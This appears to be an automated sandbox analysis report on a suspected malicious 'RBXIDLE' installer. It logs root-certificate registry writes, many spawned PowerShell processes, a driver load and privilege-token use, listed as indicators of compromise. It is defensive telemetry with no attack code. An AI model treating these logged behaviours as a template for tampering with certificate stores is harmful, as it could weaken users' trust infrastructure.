Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	netmanager.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	RBXIDLE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	RBXIDLE.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	RBXIDLE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	netmanager.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2720	chrome.exe
2720	chrome.exe
3452	rbxidle-installer.tmp
3452	rbxidle-installer.tmp
5548	msedge.exe
5548	msedge.exe
4404	powershell.exe
4404	powershell.exe
4404	powershell.exe
2816	RBXIDLE.exe
2816	RBXIDLE.exe
1512	RBXIDLE.exe
1512	RBXIDLE.exe
5564	powershell.exe
5564	powershell.exe
3628	powershell.exe
3628	powershell.exe
3472	powershell.exe
3472	powershell.exe
6080	powershell.exe
6080	powershell.exe
5232	powershell.exe
5232	powershell.exe
1920	powershell.exe
1920	powershell.exe
3636	powershell.exe
3636	powershell.exe
5556	powershell.exe
5556	powershell.exe
4356	powershell.exe
4356	powershell.exe
5156	powershell.exe
5156	powershell.exe
2512	powershell.exe
2512	powershell.exe
2368	powershell.exe
2368	powershell.exe
4844	powershell.exe
4844	powershell.exe
5536	powershell.exe
5536	powershell.exe
4844	powershell.exe
3472	powershell.exe
1920	powershell.exe
3636	powershell.exe
5564	powershell.exe
5564	powershell.exe
4356	powershell.exe
5156	powershell.exe
2512	powershell.exe
2368	powershell.exe
6080	powershell.exe
3628	powershell.exe
3628	powershell.exe
5536	powershell.exe
5232	powershell.exe
5556	powershell.exe
6360	msedge.exe
6360	msedge.exe
6844	msedge.exe
6844	msedge.exe
6764	msedge.exe
6764	msedge.exe
1788	dxdiag.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
2720	chrome.exe
6844	msedge.exe
6844	msedge.exe
6844	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
Token: SeShutdownPrivilege	2720	chrome.exe
Token: SeCreatePagefilePrivilege	2720	chrome.exe
